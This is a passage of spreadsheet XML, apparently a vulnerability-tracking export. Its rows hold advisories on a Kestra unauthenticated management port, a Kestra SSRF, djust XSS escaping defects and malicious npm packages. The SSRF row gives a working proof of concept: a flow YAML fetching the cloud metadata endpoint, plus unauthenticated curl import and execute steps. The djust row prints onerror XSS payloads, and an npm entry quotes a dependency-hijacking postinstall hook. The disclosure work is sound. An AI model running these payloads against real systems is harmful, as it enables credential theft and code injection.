- Product: Kestra (`kestra-io/kestra`), an open-source orchestration/data-pipeline platform (Java / Micronaut).
- Version: **v1.3.29** (confirmed); the management-port exposure is an insecure default of the shipped configuration.
- No fix at time of report.
## Technical detail
Kestra runs the Micronaut management/actuator endpoints on a separate HTTP port **8081**. The authentication filter (basic-auth, when configured) is scoped to the main API on port 8080 (`/api/v1/**`) and does not apply to 8081. As a result:
- `GET http://&lt;host&gt;:8081/env` returns the full resolved environment/configuration (property sources), unauthenticated.
- `POST http://&lt;host&gt;:8081/loggers/{name}` changes a logger's level at runtime, unauthenticated (a state-changing operation).
- The other Micronaut management endpoints on 8081 are similarly reachable.
The shipped `application.yml` comments, `SECURITY.md`, and the vendor's reference `docker-compose.yml` do not warn that 8081 must be kept internal, and the reference compose publishes 8081, so a deployment that enables basic-auth on the API still exposes the management port with no auth.
## Impact
An unauthenticated network client that can reach port 8081 can read the full application configuration/environment (`/env`) and change runtime logging (`/loggers`), and reach the other management endpoints — an authentication-bypass on the management surface. (Sensitive credential values in `/env` are masked, so this is scored without a full-secret-read confidentiality impact.)
## Proof of concept
Reproduced live on Kestra v1.3.29 with basic-auth enabled on the main API. Unauthenticated `GET http://&lt;host&gt;:8081/env` returned `200` with the resolved configuration/property sources, and `POST http://&lt;host&gt;:8081/loggers/{name}` returned `200` and changed the logger level — both with no credentials. The equivalent main-API request on 8080 returned `401` (control), confirming the auth filter covers only the API port and not the 8081 management port. (Credential values in `/env` were masked.)
Full request/response captures available on request.
## Remediation
Apply authentication to the management port (bind the Micronaut management endpoints behind the same auth as the API, or require a separate management credential), and by default bind port 8081 to loopback only. At minimum, document prominently (SECURITY.md, application.yml, the reference docker-compose) that port 8081 must never be exposed to untrusted networks, and do not publish 8081 in the reference compose.
## Credit
Reported by **Santosh Kumar Puppala** (GitHub: https://github.com/Santoshkumarpuppala).</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73245</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:core, Maven:io.kestra:kestra-core</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr"/>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>### Summary
The Pebble template engine's `http()` function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.
### Details
The root cause is in `core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java` (lines 77-106):
1. **No URL validation**: User input is passed directly to `URI.create()` with no checks for private IPs, internal hosts, or restricted schemes
2. **No IP filtering**: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1
3. **No scheme restriction**: `file://`, `gopher://` schemes are not blocked
4. **No authentication required**: `TenantValidationFilter.java` only checks tenant == "main" — no authentication
5. **Unconditional registration**: `HttpFunction` is registered without any feature flags in `Extension.java:180`
### PoC
**Prerequisites:**
```bash
docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local
sleep 30
```
**Step 1: Create malicious Flow YAML**
```yaml
cat &gt; /tmp/ssrf_poc.yaml &lt;&lt; 'YAML'
id: ssrf_metadata
namespace: company.team
tasks:
  - id: exfiltrate
    type: io.kestra.plugin.core.log.Log
    message: |
      {{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }}
YAML
```
**Step 2: Import without authentication**
```bash
curl -X POST http://localhost:8080/api/v1/main/flows/import \
  -F "fileUpload=@/tmp/ssrf_poc.yaml"
```
**Step 3: Execute the flow**
```bash
curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrf_metadata
```
**Step 4: Verify** — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)
### Impact
- **CVSS 3.1**: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- **CWE**: CWE-918 (Server-Side Request Forgery)
- **Affected**: All Kestra OSS versions (default deployment)
- **Impact**: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>GHSA-532p-c872-3926</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>npm:randompkga</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr"/>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4e7dfd8fb150e4c7f087a17c2ed162a8e48fe7e4e253a68df901f0e775fd68c)
package.json declares a postinstall lifecycle script `cd "$INIT_CWD" &amp;&amp; npm i randompkgb` that, on `npm install`, installs the additional npm package `randompkgb` into the consumer's project. A companion postinstall.js reads the installer's own package.json at $INIT_CWD, sets `dependencies.randompkgb = "^1.0.0"`, and writes the manifest back to disk, persisting the injected dependency across future installs and CI runs. The caret range is unpinned, so any current or future version of `randompkgb` — whose code is not present in this package and is not controlled by the installer — will be resolved and executed on the installer's machine at install time and on `require`. This is dependency-tree hijacking: the mechanism drops attacker-controlled third-party code into the installer's environment and rewrites source-controlled project state to make the injection durable.
## Source: ghsa-malware (cfdfcd7cd3af1c7b280e6f13503a472f2b31582e239d6fac0b6cacc1709cf36f)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2" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16255</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>GHSA-5r64-rpvg-q9rr</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-a</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr"/>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (be4b64316a832dd3482cc41c21d79e2005d5984e2458ed45e957ee761862de31)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3" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16248</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>1.1.1</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr"/>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Five independent defects in djust's template auto-escaping cause attacker-controlled input to be rendered as live markup where Django escapes it. All four are present in shipped 1.1.0 and are fixed in 1.1.1.
They share one shape: **a filter or grant that escapes nothing itself and relies on the render-time auto-escape, which something downstream then removes.** They are grouped into a single advisory because the mitigation is identical — upgrade to 1.1.1 — and because no single one of them is meaningfully actionable in isolation.
## 1. `linenumbers` never escaped its input (#2291)
```
{{ p|linenumbers|safe }}   with p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '1. &lt;img src=x onerror=alert(1)&gt;'      &lt;- executes
  django  '1. &amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
The filter deferred all escaping to render time; a trailing `|safe` suppressed exactly that. The exposure is wider than the `|safe` form: **any downstream filter that reads the output as markup is affected**, including `{{ p|linenumbers|truncatechars_html:"5" }}`, which contains no `|safe` at all.
## 2. `escape` was a no-op (#2281)
```
{{ p|escape|safe }}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;amp;lt;img src=x onerror=alert(1)&amp;amp;gt;'
```
Django's `escape` is eager (`conditional_escape`, returning `SafeString`). djust's returned its input unchanged and let the render site escape it — indistinguishable for `{{ p|escape }}` alone, wrong for every chain. The security cell is `{{ p|escape|safe }}`: an idiom that reads as "escape it, then it is safe to emit" — which is what Django's semantics make true — was a bare `|safe` on attacker input. A sweep of every length-2 and length-3 chain containing `escape` found **104** live-markup cells.
## 3. `unordered_list` / `safeseq` handed a string back under a safe grant (#2274)
Both carry an unconditional "emit without escaping" grant, earned because they escape every item they emit. Given a **string** rather than a sequence they emitted nothing and returned the input verbatim under that same grant, making `{{ hostile|safeseq }}` an exact synonym for `|safe` with no `mark_safe` anywhere in the template.
## 4. A safety grant outlived the value it was granted for (#2300)
**No filter chain and no `|safe` anywhere; a bare `{{ p }}` is the whole reproducer.**
Safe context keys accumulated on the view and were never revoked, so a key marked safe once stayed safe for the lifetime of the view — which spans **every event on a WebSocket connection**:
```python
render 1:  p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')     -&gt;  '&lt;b&gt;trusted&lt;/b&gt;'   correct
render 2:  p = '&lt;img src=x onerror=alert(1)&gt;'  -&gt;  executes
```
A view that renders trusted markup into a variable and later renders user input into the same variable emits it live.
## 5. A custom tag handler's return was emitted raw — including djust's own `{% render_slot %}` (#2379)
**Reachable with no `|safe`, no `mark_safe`, and no application code: using component slots is enough.**
Django's `SimpleNode.render` runs `conditional_escape` over a `simple_tag`'s return
unless it carries `__html__`. djust inserted the return verbatim, so a handler as
ordinary as `return f"Hello {name}"` emitted attacker markup live.
Of the 221 handlers djust registers, one echoes a context value unescaped —
`render_slot`, the framework's own function-component/slot tag:
```
{% render_slot p %}     p = '&lt;img src=x onerror=alert(1)&gt;'
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
Together with defect 3 this is one of the two classes reachable without the
application writing anything unusual.
## 6. `linebreaks` / `linebreaksbr` — and `|safe` was the only spelling that worked (#2284)
`linebreaks` emits `&lt;p&gt;`/`&lt;br&gt;` but neither escaped its content nor reported its
output safe. The plain spelling therefore escaped the filter's **own** tags and
printed a literal `&lt;p&gt;` on the page, so `|safe` was the only form that rendered
at all — and that form emitted the content live:
```
{{ bio|linebreaks }}         renders literal '&lt;p&gt;' text        (visibly broken)
{{ bio|linebreaks|safe }}    '&lt;img src=x onerror=alert(1)&gt;'    &lt;- executes
```
Because the broken spelling is the one a developer discards, the vulnerable
spelling is the one that ships. Any application rendering user-entered text with
paragraph breaks is written that way.
## Impact
Stored or reflected XSS in any djust application that renders untrusted input through the affected filters, or that reuses a context variable which was previously marked safe. Exploitation requires no special configuration. Defects 3, 4 and 5 require no unusual template construct at all — defect 5 needs only that the application use component slots, and defect 6's vulnerable spelling is the only one that renders correctly.
## Patches
Fixed in **1.1.1**, and in **1.2.0** (`main`).
1.1.1 re-implements each fix against 1.1.0's own code rather than back-porting `main`'s, which depends on a value-level safety model 1.1.0 does not have. Three consequences are documented in the 1.1.1 CHANGELOG and are all in the **over-escaping** direction: `{{ p|escape|F }}` double-escapes for a plain following filter `F`; `{% render_slot slot.content %}` over-escapes; and a `mark_safe`d value passed through `|escape` is escaped rather than passed through.
**Not fixed in 1.1.1**, and tracked separately: application-written tag handlers that return attacker data as a plain `str` (only djust's own `render_slot` is covered by defect 5), and a `{% with %}`/`{% for %}` bind inheriting a safety grant it never earned. Both are fixed in 1.2.0.
## Workarounds
None complete. Before upgrading, avoid `|safe` after any filter in a chain, avoid `safeseq`/`unordered_list` on values that may be strings, and avoid reusing a context variable for both `mark_safe` content and untrusted input.
## Credit
Found during an internal Django-parity audit by a registry-wide differential that compares djust's escaping capabilities against Django's across every filter chain, rather than by inspection.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9395-2g46-rj3f</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>GHSA-cqc9-f5fp-r45q</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="inlineStr"/>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgd</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr"/>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c0ebd1d508d7c8ae4aa2a0693b9d07720a837307b1a5c343c931c6e7d72d6390)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 s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16258</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>GHSA-f8wr-9w83-7gmw</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="inlineStr"/>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-takedown-b</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr"/>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (6844bb41cfa32b3ead1bd2558d13f9114c93fc9cea7be43ed4063726f259d405)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 s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16249</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>GHSA-p8m5-fmxm-99f6</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="inlineStr"/>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgc</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr"/>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (7ce22b64e51787a332ae7c65afc8789c0fb3f806199aa79d72af9ff02eb867d1)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 s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16257</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>GHSA-p957-4pc7-x6hp</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="inlineStr"/>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:kartykgithub-multiversion-a</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr"/>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (cf524b1c8a586bcece6d65140e168a40adec8699c1cc7af61263bfd2a6b84543)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 s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>GHSA-q83w-3hvr-fgg7</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="inlineStr"/>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-b</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr"/>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (f59dc68aae74875f986021660cb054d4055e7f7113e31234e8a9589c44edfb6f)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9" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16266</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>GHSA-rc4q-v4pf-8j7x</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="inlineStr"/>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>npm:randompkge</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (95eb389e78a05b76dfefafd460f3280f3fabf8fcd1dfc55946b04bef84b26116)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0" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16259</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>GHSA-rx76-mcg9-gqc5</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="inlineStr"/>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:@kartyk-github-org/takedown-a</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (bf2fb1adf14524d97cbb2a621413f9d25b8ac020fc927b92fa8f9aff52edef70)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1" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16265</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>GHSA-vxvv-gh3g-35pj</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="inlineStr"/>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:randompkgb</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (5daf14ba0ddb406ffdd9b17e6be63713fe9f66cf739753e8b20ffb128a8b1323)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2" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16256</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr">
